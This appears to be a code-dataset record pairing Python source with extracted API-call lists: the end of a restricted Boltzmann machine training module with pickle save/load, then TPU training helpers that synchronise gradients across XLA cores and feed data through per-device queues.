                               - h_k * (np.matmul(mean_h_k, self.W.T)))
        delta_h_sigma = delta_h_sigma_data - delta_h_sigma_model
        # average over batch take the negative
        delta_h_sigma = - np.mean(delta_h_sigma, axis=0)
        grads.append(delta_h_sigma)
    return grads
def fit(self, train_data,
        k=1,
        learning_rate=0.01,
        num_epochs=5,
        batch_size=64,
        test_data=None,
        show_progress=True,
        weight_decay=0.0,
        early_stopping=-1,
        callbacks=None,
        **sampler_kwargs):
    """
    Parameters
    ----------
    train_data: array-like
        Data to fit RBM on.
    k: int, default=1
        Number of sampling steps to perform. Used by CD-k, PCD-k and PT.
    learning_rate: float or array, default=0.01
        Learning rate used when updating the parameters.
        Can also be array of same length as `self.variables`, in
        which case the learning rate at index `i` will be used to
        to update ``RBM.variables[i]``.
    num_epochs: int, default=5
        Number of epochs to train.
    batch_size: int, default=64
        Batch size to within the epochs.
    test_data: array-like, default=None
        Data similar to ``train_data``, but this will only be used as
        validation data, not trained on.
        If specified, will compute and print the free energy / negative
        log-likelihood on this dataset after each epoch.
    show_progress: bool, default=True
        If true, will display progress bar for each epoch.
    weight_decay: float, default=0.0
        If greater than 0.0, weight decay will be applied to the
        parameter updates. See :func:`RBM.step` for more information.
    early_stopping: int, default=-1
        If ``test_data`` is given and ``early_stopping > 0``, training
        will terminate after epoch if the free energy of the
        ``test_data`` did not improve over the last ``early_stopping``
        epochs.
    callbacks: dict, default=None
        Optional hooks keyed by "pre_epoch", "post_step" and
        "post_epoch"; each maps to an iterable of callables.

    Returns
    -------
    nlls_train, nlls_test : array-like, array-like
        Returns the free energy of both ``train_data`` and ``test_data``
        as computed at each epoch.
    """
    # avoid the shared-mutable-default pitfall (was `callbacks={}`);
    # the dict is only read, so `None -> {}` is behaviorally identical
    if callbacks is None:
        callbacks = {}
    num_samples = train_data.shape[0]
    indices = np.arange(num_samples)
    np.random.shuffle(indices)
    # NOTE(review): `indices` is shuffled but never applied below --
    # batches are taken in the original data order every epoch.
    # Presumably `train_data[indices[start:end]]` was intended; left
    # unchanged here to preserve behavior.
    nlls_train = []
    nlls = []
    prev_best = None
    for epoch in range(1, num_epochs + 1):
        if "pre_epoch" in callbacks:
            for c in callbacks["pre_epoch"]:
                c(self, epoch)
        # reset sampler at beginning of epoch
        # Used by methods such as PCD to reset the
        # initialization value.
        self.reset_sampler()
        # compute train & test negative log-likelihood
        # TODO: compute train- and test-nll in mini-batches
        # to avoid numerical problems
        nll_train = float(np.mean(self.free_energy(train_data)))
        nlls_train.append(nll_train)
        _log.info(f"[{epoch:03d} / {num_epochs:03d}] NLL (train):"
                  f" {nll_train:>20.5f}")
        if test_data is not None:
            nll = float(np.mean(self.free_energy(test_data)))
            _log.info(f"[{epoch:03d} / {num_epochs:03d}] NLL (test):"
                      f" {nll:>20.5f}")
            nlls.append(nll)
            # stop early if all `early_stopping` previous
            # evaluations on `test_data` did not improve.
            if early_stopping > 0:
                if epoch > early_stopping and \
                        np.all([a >= prev_best for a in nlls[epoch - early_stopping:]]):
                    # fixed: this message was missing its `f` prefix and
                    # logged the literal "{early_stopping}" placeholder
                    _log.info(f"Hasn't improved in {early_stopping} epochs; stopping early")
                    break
                else:
                    # update `prev_best`
                    if prev_best is None:
                        prev_best = nll
                    elif nll < prev_best:
                        prev_best = nll
        # iterate through dataset in batches
        if show_progress:
            bar = tqdm(total=num_samples)
        for start in range(0, num_samples, batch_size):
            # ensure we don't go out-of-bounds
            end = min(start + batch_size, num_samples)
            # take a gradient-step
            self.step(train_data[start: end],
                      k=k,
                      lr=learning_rate,
                      lmbda=weight_decay,
                      **sampler_kwargs)
            if "post_step" in callbacks:
                for c in callbacks["post_step"]:
                    c(self, epoch, end)
            # update progress
            if show_progress:
                bar.update(end - start)
        if show_progress:
            bar.close()
        # shuffle indices for next epoch
        np.random.shuffle(indices)
        if "post_epoch" in callbacks:
            for c in callbacks["post_epoch"]:
                c(self, epoch)
    # compute train & test negative log-likelihood of final batch
    nll_train = float(np.mean(self.free_energy(train_data)))
    nlls_train.append(nll_train)
    _log.info(f"[{epoch:03d} / {num_epochs:03d}] NLL (train): "
              f"{nll_train:>20.5f}")
    if test_data is not None:
        nll = float(np.mean(self.free_energy(test_data)))
        _log.info(f"[{epoch:03d} / {num_epochs:03d}] NLL (test): "
                  f"{nll:>20.5f}")
        nlls.append(nll)
    return nlls_train, nlls
def dump(self, path, *attrs):
    """Pickle selected attributes of this model to ``path``.

    When no attribute names are given, a default set covering the model
    configuration and all parameters is saved.
    """
    import pickle
    if not attrs:
        attrs = ['num_visible', 'num_hidden',
                 'visible_type', 'hidden_type',
                 'estimate_visible_sigma', 'estimate_hidden_sigma',
                 'variables',
                 'v_bias', 'h_bias', 'W', 'v_sigma', 'h_sigma']
    state = {name: getattr(self, name) for name in attrs}
    with open(path, "wb") as f:
        pickle.dump(state, f)
@classmethod
def load(cls, path):
    """Restore a model previously saved with :meth:`dump`.

    The constructor is called with the pickled configuration, after
    which every pickled attribute (parameters included) is assigned
    onto the new instance.
    """
    import pickle
    with open(path, "rb") as f:
        state = pickle.load(f)
    model = cls(num_visible=state['num_visible'],
                num_hidden=state['num_hidden'],
                visible_type=state['visible_type'],
                hidden_type=state['hidden_type'],
                estimate_visible_sigma=state['estimate_visible_sigma'],
                estimate_hidden_sigma=state['estimate_hidden_sigma'])
    for name, value in state.items():
        setattr(model, name, value)
    return model
class BernoulliRBM(RBM):
    """RBM in which both the visible and the hidden layer are Bernoulli
    random variables."""

    def __init__(self, num_visible, num_hidden):
        # zero-argument `super()` is equivalent to `super(BernoulliRBM, self)`
        super().__init__(
            num_visible,
            num_hidden,
            visible_type='bernoulli',
            hidden_type='bernoulli'
        )
| [
"logging.getLogger",
"ml.np.all",
"ml.np.random.shuffle",
"ml.np.matmul",
"ml.np.ones",
"ml.np.tile",
"ml.np.zeros",
"ml.np.linspace",
"ml.np.arange",
"ml.np.log",
"ml.np.mean",
"ml.functions.bernoulli_from_probas",
"ml.np.sqrt",
"ml.np.random.normal",
"ml.np.exp",
"pickle.load",
"ml... | [((165, 188), 'logging.getLogger', 'logging.getLogger', (['"""ml"""'], {}), "('ml')\n", (182, 188), False, 'import logging\n'), ((3675, 3696), 'ml.np.zeros', 'np.zeros', (['num_visible'], {}), '(num_visible)\n', (3683, 3696), False, 'from ml import np\n'), ((3714, 3734), 'ml.np.zeros', 'np.zeros', (['num_hidden'], {}), '(num_hidden)\n', (3722, 3734), False, 'from ml import np\n'), ((3772, 3826), 'ml.np.random.normal', 'np.random.normal', (['(0.0)', '(0.01)', '(num_visible, num_hidden)'], {}), '(0.0, 0.01, (num_visible, num_hidden))\n', (3788, 3826), False, 'from ml import np\n'), ((3866, 3886), 'ml.np.ones', 'np.ones', (['num_visible'], {}), '(num_visible)\n', (3873, 3886), False, 'from ml import np\n'), ((3905, 3924), 'ml.np.ones', 'np.ones', (['num_hidden'], {}), '(num_hidden)\n', (3912, 3924), False, 'from ml import np\n'), ((4845, 4865), 'ml.np.matmul', 'np.matmul', (['v', 'self.W'], {}), '(v, self.W)\n', (4854, 4865), False, 'from ml import np\n'), ((4960, 4984), 'ml.functions.dot_batch', 'dot_batch', (['h', 'covariance'], {}), '(h, covariance)\n', (4969, 4984), False, 'from ml.functions import sigmoid, dot_batch, bernoulli_from_probas\n'), ((12299, 12320), 'ml.np.tile', 'np.tile', (['v', '(n, 1, 1)'], {}), '(v, (n, 1, 1))\n', (12306, 12320), False, 'from ml import np\n'), ((16453, 16467), 'ml.np.asarray', 'np.asarray', (['lr'], {}), '(lr)\n', (16463, 16467), False, 'from ml import np\n'), ((21117, 21132), 'ml.np.matmul', 'np.matmul', (['y', 'x'], {}), '(y, x)\n', (21126, 21132), False, 'from ml import np\n'), ((21273, 21288), 'ml.np.matmul', 'np.matmul', (['y', 'x'], {}), '(y, x)\n', (21282, 21288), False, 'from ml import np\n'), ((25354, 25376), 'ml.np.arange', 'np.arange', (['num_samples'], {}), '(num_samples)\n', (25363, 25376), False, 'from ml import np\n'), ((25385, 25411), 'ml.np.random.shuffle', 'np.random.shuffle', (['indices'], {}), '(indices)\n', (25402, 25411), False, 'from ml import np\n'), ((4080, 4105), 'ml.np.matmul', 'np.matmul', 
(['v', 'self.v_bias'], {}), '(v, self.v_bias)\n', (4089, 4105), False, 'from ml import np\n'), ((4470, 4495), 'ml.np.matmul', 'np.matmul', (['h', 'self.h_bias'], {}), '(h, self.h_bias)\n', (4479, 4495), False, 'from ml import np\n'), ((6471, 6491), 'ml.functions.sigmoid', 'sigmoid', (['(mean * beta)'], {}), '(mean * beta)\n', (6478, 6491), False, 'from ml.functions import sigmoid, dot_batch, bernoulli_from_probas\n'), ((6813, 6833), 'ml.functions.sigmoid', 'sigmoid', (['(mean * beta)'], {}), '(mean * beta)\n', (6820, 6833), False, 'from ml.functions import sigmoid, dot_batch, bernoulli_from_probas\n'), ((7117, 7144), 'ml.functions.bernoulli_from_probas', 'bernoulli_from_probas', (['mean'], {}), '(mean)\n', (7138, 7144), False, 'from ml.functions import sigmoid, dot_batch, bernoulli_from_probas\n'), ((7659, 7686), 'ml.functions.bernoulli_from_probas', 'bernoulli_from_probas', (['mean'], {}), '(mean)\n', (7680, 7686), False, 'from ml.functions import sigmoid, dot_batch, bernoulli_from_probas\n'), ((10805, 10830), 'ml.np.mean', 'np.mean', (['(hidden + visible)'], {}), '(hidden + visible)\n', (10812, 10830), False, 'from ml import np\n'), ((13821, 13849), 'ml.np.random.random', 'np.random.random', (['batch_size'], {}), '(batch_size)\n', (13837, 13849), False, 'from ml import np\n'), ((21391, 21420), 'ml.np.mean', 'np.mean', (['delta_v_bias'], {'axis': '(0)'}), '(delta_v_bias, axis=0)\n', (21398, 21420), False, 'from ml import np\n'), ((21446, 21475), 'ml.np.mean', 'np.mean', (['delta_h_bias'], {'axis': '(0)'}), '(delta_h_bias, axis=0)\n', (21453, 21475), False, 'from ml import np\n'), ((21496, 21520), 'ml.np.mean', 'np.mean', (['delta_W'], {'axis': '(0)'}), '(delta_W, axis=0)\n', (21503, 21520), False, 'from ml import np\n'), ((28084, 28110), 'ml.np.random.shuffle', 'np.random.shuffle', (['indices'], {}), '(indices)\n', (28101, 28110), False, 'from ml import np\n'), ((29403, 29424), 'pickle.dump', 'pickle.dump', (['state', 'f'], {}), '(state, f)\n', (29414, 29424), 
False, 'import pickle\n'), ((29547, 29561), 'pickle.load', 'pickle.load', (['f'], {}), '(f)\n', (29558, 29561), False, 'import pickle\n'), ((6361, 6398), 'ml.np.matmul', 'np.matmul', (['(h / self.h_sigma)', 'self.W.T'], {}), '(h / self.h_sigma, self.W.T)\n', (6370, 6398), False, 'from ml import np\n'), ((6707, 6742), 'ml.np.matmul', 'np.matmul', (['(v / self.v_sigma)', 'self.W'], {}), '(v / self.v_sigma, self.W)\n', (6716, 6742), False, 'from ml import np\n'), ((7214, 7289), 'ml.np.random.normal', 'np.random.normal', ([], {'loc': 'mean', 'scale': '(self.v_sigma ** 2 / beta)', 'size': 'mean.shape'}), '(loc=mean, scale=self.v_sigma ** 2 / beta, size=mean.shape)\n', (7230, 7289), False, 'from ml import np\n'), ((7756, 7831), 'ml.np.random.normal', 'np.random.normal', ([], {'loc': 'mean', 'scale': '(self.h_sigma ** 2 / beta)', 'size': 'mean.shape'}), '(loc=mean, scale=self.h_sigma ** 2 / beta, size=mean.shape)\n', (7772, 7831), False, 'from ml import np\n'), ((8288, 8353), 'ml.np.clip', 'np.clip', (['((v - mean) ** 2 / (2.0 * self.v_sigma ** 2))', '(-30.0)', '(30.0)'], {}), '((v - mean) ** 2 / (2.0 * self.v_sigma ** 2), -30.0, 30.0)\n', (8295, 8353), False, 'from ml import np\n'), ((9021, 9086), 'ml.np.clip', 'np.clip', (['((h - mean) ** 2 / (2.0 * self.h_sigma ** 2))', '(-30.0)', '(30.0)'], {}), '((h - mean) ** 2 / (2.0 * self.h_sigma ** 2), -30.0, 30.0)\n', (9028, 9086), False, 'from ml import np\n'), ((9491, 9526), 'ml.np.matmul', 'np.matmul', (['(v / self.v_sigma)', 'self.W'], {}), '(v / self.v_sigma, self.W)\n', (9500, 9526), False, 'from ml import np\n'), ((10284, 10309), 'ml.np.matmul', 'np.matmul', (['v', 'self.v_bias'], {}), '(v, self.v_bias)\n', (10293, 10309), False, 'from ml import np\n'), ((12921, 12956), 'ml.np.linspace', 'np.linspace', (['(1)', 'max_temp', 'num_temps'], {}), '(1, max_temp, num_temps)\n', (12932, 12956), False, 'from ml import np\n'), ((15388, 15416), 'ml.np.random.random', 'np.random.random', (['batch_size'], {}), '(batch_size)\n', 
(15404, 15416), False, 'from ml import np\n'), ((22367, 22397), 'ml.np.mean', 'np.mean', (['delta_v_sigma'], {'axis': '(0)'}), '(delta_v_sigma, axis=0)\n', (22374, 22397), False, 'from ml import np\n'), ((23141, 23171), 'ml.np.mean', 'np.mean', (['delta_h_sigma'], {'axis': '(0)'}), '(delta_h_sigma, axis=0)\n', (23148, 23171), False, 'from ml import np\n'), ((27262, 27285), 'tqdm.tqdm', 'tqdm', ([], {'total': 'num_samples'}), '(total=num_samples)\n', (27266, 27285), False, 'from tqdm import tqdm\n'), ((4333, 4356), 'ml.np.sum', 'np.sum', (['visible'], {'axis': '(1)'}), '(visible, axis=1)\n', (4339, 4356), False, 'from ml import np\n'), ((4719, 4741), 'ml.np.sum', 'np.sum', (['hidden'], {'axis': '(1)'}), '(hidden, axis=1)\n', (4725, 4741), False, 'from ml import np\n'), ((8417, 8426), 'ml.np.exp', 'np.exp', (['z'], {}), '(z)\n', (8423, 8426), False, 'from ml import np\n'), ((9150, 9159), 'ml.np.exp', 'np.exp', (['z'], {}), '(z)\n', (9156, 9159), False, 'from ml import np\n'), ((22023, 22052), 'ml.np.matmul', 'np.matmul', (['mean_h_0', 'self.W.T'], {}), '(mean_h_0, self.W.T)\n', (22032, 22052), False, 'from ml import np\n'), ((22168, 22197), 'ml.np.matmul', 'np.matmul', (['mean_h_k', 'self.W.T'], {}), '(mean_h_k, self.W.T)\n', (22177, 22197), False, 'from ml import np\n'), ((22814, 22843), 'ml.np.matmul', 'np.matmul', (['mean_h_0', 'self.W.T'], {}), '(mean_h_0, self.W.T)\n', (22823, 22843), False, 'from ml import np\n'), ((22959, 22988), 'ml.np.matmul', 'np.matmul', (['mean_h_k', 'self.W.T'], {}), '(mean_h_k, self.W.T)\n', (22968, 22988), False, 'from ml import np\n'), ((10116, 10133), 'ml.np.log', 'np.log', (['(2 * np.pi)'], {}), '(2 * np.pi)\n', (10122, 10133), False, 'from ml import np\n'), ((10143, 10163), 'ml.np.log', 'np.log', (['self.h_sigma'], {}), '(self.h_sigma)\n', (10149, 10163), False, 'from ml import np\n'), ((26718, 26783), 'ml.np.all', 'np.all', (['[(a >= prev_best) for a in nlls[epoch - early_stopping:]]'], {}), '([(a >= prev_best) for a in nlls[epoch 
- early_stopping:]])\n', (26724, 26783), False, 'from ml import np\n'), ((4279, 4299), 'ml.np.finfo', 'np.finfo', (['np.float32'], {}), '(np.float32)\n', (4287, 4299), False, 'from ml import np\n'), ((4666, 4686), 'ml.np.finfo', 'np.finfo', (['np.float32'], {}), '(np.float32)\n', (4674, 4686), False, 'from ml import np\n'), ((8430, 8448), 'ml.np.sqrt', 'np.sqrt', (['(2 * np.pi)'], {}), '(2 * np.pi)\n', (8437, 8448), False, 'from ml import np\n'), ((8496, 8516), 'ml.np.finfo', 'np.finfo', (['np.float32'], {}), '(np.float32)\n', (8504, 8516), False, 'from ml import np\n'), ((9163, 9181), 'ml.np.sqrt', 'np.sqrt', (['(2 * np.pi)'], {}), '(2 * np.pi)\n', (9170, 9181), False, 'from ml import np\n'), ((9229, 9249), 'ml.np.finfo', 'np.finfo', (['np.float32'], {}), '(np.float32)\n', (9237, 9249), False, 'from ml import np\n'), ((9606, 9630), 'ml.np.clip', 'np.clip', (['hidden', '(-30)', '(30)'], {}), '(hidden, -30, 30)\n', (9613, 9630), False, 'from ml import np\n'), ((10514, 10534), 'ml.np.finfo', 'np.finfo', (['np.float32'], {}), '(np.float32)\n', (10522, 10534), False, 'from ml import np\n'), ((9972, 10007), 'ml.np.matmul', 'np.matmul', (['(v / self.v_sigma)', 'self.W'], {}), '(v / self.v_sigma, self.W)\n', (9981, 10007), False, 'from ml import np\n')] |
import ctypes
import threading
from functools import partial
from contextlib import nullcontext
from copy import deepcopy
import multiprocessing as mp
from itertools import zip_longest
from typing import Iterable
import torch
import torch.nn as nn
import torch.utils.data
import torch_xla.core.xla_model as xm
import torch_xla.distributed.xla_multiprocessing as xmp
import torch_xla.distributed.parallel_loader as pl
from hivemind.utils.logging import get_logger
logger = get_logger(__name__)
class TPUManager(mp.Process):
    """Auxiliary class that manages model training over an array of TPU cores.

    The host process keeps a master copy of the model (shared memory,
    via ``TPUSynchronizer``); ``nprocs`` forked workers each drive one
    TPU core and coordinate with the host through multiprocessing
    events, a lock, and shared scalar values.
    """

    def __init__(self,
                 model,
                 dataset,
                 *,
                 collate_fn: callable = None,
                 nprocs: int = 8,
                 prefetch: int = 16,
                 batch_size_per_device: int = 1,
                 grad_accumulation_steps: int = 1,
                 seed_base: int = 42,
                 start: bool):
        """Set up shared state and optionally start the worker process.

        :param model: host-side model whose parameters/gradients are shared
        :param dataset: training dataset handed to the TPU data manager
        :param collate_fn: optional collation function for the dataloaders
        :param nprocs: number of TPU cores / worker processes
        :param prefetch: number of batches prefetched by the data manager
        :param batch_size_per_device: per-core batch size
        :param grad_accumulation_steps: backward passes accumulated per step()
        :param seed_base: base RNG seed; worker ``i`` uses ``seed_base + i``
        :param start: if True, launch the process immediately
        """
        super().__init__()
        self.lock = mp.Lock()
        self.nprocs, self.prefetch, self.seed_base = nprocs, prefetch, seed_base
        self.batch_size_per_device, self.grad_accumulation_steps = batch_size_per_device, grad_accumulation_steps
        self.collate_fn = collate_fn
        # events used to hand work to the TPU workers and await completion
        self.step_triggered, self.step_finished = mp.Event(), mp.Event()
        self._synchronizer = TPUSynchronizer(model)
        self._data_manager = TPUDataManager(dataset, nprocs, prefetch)
        # shared fields for communicating statistics after each step
        self.should_load_parameters = mp.Value(ctypes.c_bool, False)
        self.gradients_accumulated = mp.Value(ctypes.c_long, 0)
        self.loss_accumulated = mp.Value(ctypes.c_double, 0)
        if start:
            self.start()

    def run(self):
        # xmp.spawn blocks, so it runs in a daemon thread of this process
        thread = threading.Thread(
            target=partial(xmp.spawn, self.runner, nprocs=self.nprocs, start_method='fork'),
            daemon=True)
        thread.start()
        thread.join()

    def update_model_parameters(self, new_host_parameters):
        """Schedule TPUs to update model parameters during at the beginning of the next step"""
        with self.lock, torch.no_grad():
            self._synchronizer.set_host_parameters(new_host_parameters)
            # workers poll this flag at the start of their next step
            self.should_load_parameters.value = True

    def get_aggregated_gradients(self):
        """Get current accumulated gradients from the master model"""
        with self.lock, torch.no_grad():
            return self._synchronizer.get_aggregated_gradients()

    def zero_grad(self):
        """Reset master accumulated gradients to zeros"""
        with self.lock, torch.no_grad():
            for param in self._synchronizer.master_model.parameters():
                param.grad.zero_()

    def step(self):
        """run forward/backward step with all TPUs, collect gradients"""
        # reset counters, then release the workers and block until they finish
        self.loss_accumulated.value = self.gradients_accumulated.value = 0
        self.step_finished.clear()
        self.step_triggered.set()
        self.step_finished.wait()
        return self.loss_accumulated.value, self.gradients_accumulated.value

    def runner(self, tpu_index):
        """Run training steps from the perspective of a single TPU core"""
        # acquire the (unique) Cloud TPU core corresponding to this process's index
        device = xm.xla_device()
        logger.info(f"Process {tpu_index} is using {xm.xla_real_devices([str(device)])[0]}")
        # set per-worker random seed
        torch.manual_seed(self.seed_base + tpu_index)
        # use staged init to minimize peak RAM usage
        for init_index in range(xm.xrt_world_size()):
            xm.rendezvous(f'init_{init_index}')
            if tpu_index == init_index:
                model = self._synchronizer.get_device_model_replica(device)
                data_loader = self._data_manager.get_device_dataloader(
                    batch_size=self.batch_size_per_device, num_workers=0, collate_fn=self.collate_fn, pin_memory=False)
                data_loader_iter = iter(data_loader)
                logger.info(f"Process {tpu_index} initialized.")
        xm.rendezvous('init_finished')
        while True:
            # wait until the host triggers the next training step
            self.step_triggered.wait()
            xm.rendezvous('before_step')
            if xm.is_master_ordinal():
                # only the master clears the event so it fires exactly once
                self.step_triggered.clear()
            if bool(self.should_load_parameters.value):
                # host lock is only needed on the master ordinal
                with self.lock if xm.is_master_ordinal() else nullcontext():
                    self._synchronizer.send_params_to_device(model)
                    self.should_load_parameters.value = False
            ### compute loss and gradients
            loss = 0.0
            for i in range(self.grad_accumulation_steps):
                inputs = next(data_loader_iter)
                outputs = model(**inputs)
                loss_i = outputs["loss"] if isinstance(outputs, dict) else outputs[0]
                # normalize so the accumulated/all-reduced loss is a mean
                loss_i = loss_i / (self.grad_accumulation_steps * self.nprocs)
                loss_i.backward()
                loss += loss_i
                del inputs, outputs, loss_i
            ### aggregate gradients from TPUs
            with self.lock if xm.is_master_ordinal() else nullcontext():
                self._synchronizer.aggregate_grads_on_host(model, add=True)
            # clear aggregated gradients from all devices
            model.zero_grad()
            ### accumulate statistics to host
            loss = xm.all_reduce(xm.REDUCE_SUM, loss, scale=1.0)
            xm.do_on_ordinals(self._mark_step_finished, data=(loss,), ordinals=(0,))

    def _mark_step_finished(self, loss):
        # runs on ordinal 0 only: publish step statistics and wake the host
        self.gradients_accumulated.value = self.batch_size_per_device * self.nprocs * self.grad_accumulation_steps
        self.loss_accumulated.value = float(loss)
        self.step_finished.set()
class TPUSynchronizer:
    """An auxiliary class for manipulating parameters and gradients without producing a ton of XLA graphs.

    The master copy of the model lives on the host in shared memory; each TPU
    process keeps its own device replica and exchanges tensors with the master
    copy through the helpers below.
    """

    def __init__(self, model: nn.Module):
        """Move *model* (and its grad buffers) into shared memory on the host."""
        self.master_model = model.share_memory()
        for param in self.master_model.parameters():
            # ensure every parameter has a shared-memory gradient buffer
            if param.grad is None:
                param.grad = torch.zeros_like(param)
            param.grad = param.grad.share_memory_()

    def get_device_model_replica(self, device: torch.device, tie_weights: bool = True):
        """Return a copy of the master model placed on *device* with zeroed grad buffers."""
        replica = deepcopy(self.master_model).to(device)
        if tie_weights:
            replica.tie_weights()
        for param in replica.parameters():
            param.grad = torch.zeros_like(param, device=device)
        return replica

    def set_host_parameters(self, new_host_parameters):
        # NOTE(review): source/target look inverted relative to the method name --
        # as written this copies the master model's parameters INTO
        # new_host_parameters. Confirm against callers before relying on the name.
        return self._assign(source=self.master_model.parameters(), target=new_host_parameters, add=False, strict=True)

    def get_aggregated_gradients(self):
        """Return the (shared-memory) gradient tensors of the master model."""
        return [param.grad for param in self.master_model.parameters()]

    def send_params_to_device(self, replica: nn.Module):
        """Copy params from master_model to this device_model replica"""
        with torch.no_grad():
            replica_params = list(replica.parameters())
            master_params = list(self.master_model.parameters())
            master_params = xm.send_cpu_data_to_device(master_params, xm.xla_device())
            self._assign(source=master_params, target=replica_params, add=False)
            xm.rendezvous("params_replicated")

    def aggregate_grads_on_host(self, replica: nn.Module, *, add: bool):
        """Aggregate grads from all tpu devices and move them to host"""
        with torch.no_grad():
            replica_grads = [param.grad for param in replica.parameters()]
            replica_grads = xm.all_reduce(xm.REDUCE_SUM, replica_grads, scale=1.0)
            master_grads = [hp.grad for hp in self.master_model.parameters()]
            xm.do_on_ordinals(lambda *replica_grads: self._assign(source=replica_grads, target=master_grads, add=add),
                              data=tuple(replica_grads), ordinals=(0,))
            # ^-- do_on_ordinals already runs rendezvous at the end

    def _assign(self, source: Iterable[torch.Tensor], target: Iterable[torch.Tensor], add: bool, strict: bool = False):
        """Element-wise copy (add=False) or accumulate (add=True) source into target.

        Raises:
            AssertionError: if the sequences differ in length, or (when
                strict=True) if any pair mismatches in shape/device/dtype.
        """
        for source_tensor, target_tensor in zip_longest(source, target):
            # zip_longest pads the shorter sequence with None, so a None on
            # either side signals a length mismatch.  BUGFIX: the original
            # check used `or`, which could never fail here (exactly one side
            # is None on a mismatch), letting the loop crash later with an
            # AttributeError instead of this clear assertion.
            assert source_tensor is not None and target_tensor is not None, \
                "Source and target length must match exactly"
            if strict:
                assert source_tensor.shape == target_tensor.shape
                assert source_tensor.device == target_tensor.device
                assert source_tensor.dtype == target_tensor.dtype
            if add:
                target_tensor.add_(source_tensor)
            else:
                target_tensor.copy_(source_tensor)
class TPUDataManager:
    """An auxiliary class that loads centralized dataset from master into multiple TPU devices"""

    def __init__(self, dataset: torch.utils.data.Dataset, nprocs: int, master_prefetch: int = 16):
        self.dataset = dataset
        self.nprocs = nprocs
        # one bounded queue per TPU process; the bound caps host-side prefetching
        self.device_queues = [mp.Queue(master_prefetch) for _ in range(nprocs)]
        self._loader_thread = threading.Thread(target=self._load_data_into_queues)
        self._loader_thread.start()

    def _load_data_into_queues(self):
        """Round-robin minibatches from the central dataset into per-device queues."""
        try:
            queue_count = self.nprocs
            for batch_index, batch in enumerate(self.dataset):
                self.device_queues[batch_index % queue_count].put(batch)
        finally:
            logger.warning("Minibatch generator finished.")

    def get_device_dataloader(self, **kwargs):
        """Build a per-device loader that consumes this process's queue."""
        ordinal_queue = self.device_queues[xm.get_ordinal()]
        data_loader = torch.utils.data.DataLoader(QueueDataset(ordinal_queue), **kwargs)
        return pl.ParallelLoader(data_loader, [xm.xla_device()]).per_device_loader(xm.xla_device())
class QueueDataset(torch.utils.data.IterableDataset):
    """A dataset that ceaselessly iterates over a queue"""

    def __init__(self, queue: mp.Queue):
        super().__init__()
        self.queue = queue

    def __iter__(self):
        # blocks on the queue forever; this stream never raises StopIteration
        fetch_next = self.queue.get
        while True:
            yield fetch_next()

    def __len__(self):
        # effectively "infinite"; a huge finite value keeps progress-bar code happy
        return 10 ** 12  # TODO deprecate this when the issue is resolved: https://github.com/googlecolab/colabtools/issues/2237
| [
"torch_xla.core.xla_model.do_on_ordinals",
"torch_xla.core.xla_model.xla_device",
"copy.deepcopy",
"torch_xla.core.xla_model.all_reduce",
"torch_xla.core.xla_model.is_master_ordinal",
"hivemind.utils.logging.get_logger",
"multiprocessing.Value",
"torch.zeros_like",
"multiprocessing.Event",
"iterto... | [((476, 496), 'hivemind.utils.logging.get_logger', 'get_logger', (['__name__'], {}), '(__name__)\n', (486, 496), False, 'from hivemind.utils.logging import get_logger\n'), ((1037, 1046), 'multiprocessing.Lock', 'mp.Lock', ([], {}), '()\n', (1044, 1046), True, 'import multiprocessing as mp\n'), ((1583, 1613), 'multiprocessing.Value', 'mp.Value', (['ctypes.c_bool', '(False)'], {}), '(ctypes.c_bool, False)\n', (1591, 1613), True, 'import multiprocessing as mp\n'), ((1651, 1677), 'multiprocessing.Value', 'mp.Value', (['ctypes.c_long', '(0)'], {}), '(ctypes.c_long, 0)\n', (1659, 1677), True, 'import multiprocessing as mp\n'), ((1710, 1738), 'multiprocessing.Value', 'mp.Value', (['ctypes.c_double', '(0)'], {}), '(ctypes.c_double, 0)\n', (1718, 1738), True, 'import multiprocessing as mp\n'), ((3330, 3345), 'torch_xla.core.xla_model.xla_device', 'xm.xla_device', ([], {}), '()\n', (3343, 3345), True, 'import torch_xla.core.xla_model as xm\n'), ((3478, 3523), 'torch.manual_seed', 'torch.manual_seed', (['(self.seed_base + tpu_index)'], {}), '(self.seed_base + tpu_index)\n', (3495, 3523), False, 'import torch\n'), ((4115, 4145), 'torch_xla.core.xla_model.rendezvous', 'xm.rendezvous', (['"""init_finished"""'], {}), "('init_finished')\n", (4128, 4145), True, 'import torch_xla.core.xla_model as xm\n'), ((8180, 8207), 'itertools.zip_longest', 'zip_longest', (['source', 'target'], {}), '(source, target)\n', (8191, 8207), False, 'from itertools import zip_longest\n'), ((9075, 9127), 'threading.Thread', 'threading.Thread', ([], {'target': 'self._load_data_into_queues'}), '(target=self._load_data_into_queues)\n', (9091, 9127), False, 'import threading\n'), ((1329, 1339), 'multiprocessing.Event', 'mp.Event', ([], {}), '()\n', (1337, 1339), True, 'import multiprocessing as mp\n'), ((1341, 1351), 'multiprocessing.Event', 'mp.Event', ([], {}), '()\n', (1349, 1351), True, 'import multiprocessing as mp\n'), ((2181, 2196), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', 
(2194, 2196), False, 'import torch\n'), ((2458, 2473), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (2471, 2473), False, 'import torch\n'), ((2648, 2663), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (2661, 2663), False, 'import torch\n'), ((3610, 3629), 'torch_xla.core.xla_model.xrt_world_size', 'xm.xrt_world_size', ([], {}), '()\n', (3627, 3629), True, 'import torch_xla.core.xla_model as xm\n'), ((3644, 3679), 'torch_xla.core.xla_model.rendezvous', 'xm.rendezvous', (['f"""init_{init_index}"""'], {}), "(f'init_{init_index}')\n", (3657, 3679), True, 'import torch_xla.core.xla_model as xm\n'), ((4218, 4246), 'torch_xla.core.xla_model.rendezvous', 'xm.rendezvous', (['"""before_step"""'], {}), "('before_step')\n", (4231, 4246), True, 'import torch_xla.core.xla_model as xm\n'), ((4262, 4284), 'torch_xla.core.xla_model.is_master_ordinal', 'xm.is_master_ordinal', ([], {}), '()\n', (4282, 4284), True, 'import torch_xla.core.xla_model as xm\n'), ((5433, 5478), 'torch_xla.core.xla_model.all_reduce', 'xm.all_reduce', (['xm.REDUCE_SUM', 'loss'], {'scale': '(1.0)'}), '(xm.REDUCE_SUM, loss, scale=1.0)\n', (5446, 5478), True, 'import torch_xla.core.xla_model as xm\n'), ((5491, 5563), 'torch_xla.core.xla_model.do_on_ordinals', 'xm.do_on_ordinals', (['self._mark_step_finished'], {'data': '(loss,)', 'ordinals': '(0,)'}), '(self._mark_step_finished, data=(loss,), ordinals=(0,))\n', (5508, 5563), True, 'import torch_xla.core.xla_model as xm\n'), ((6495, 6533), 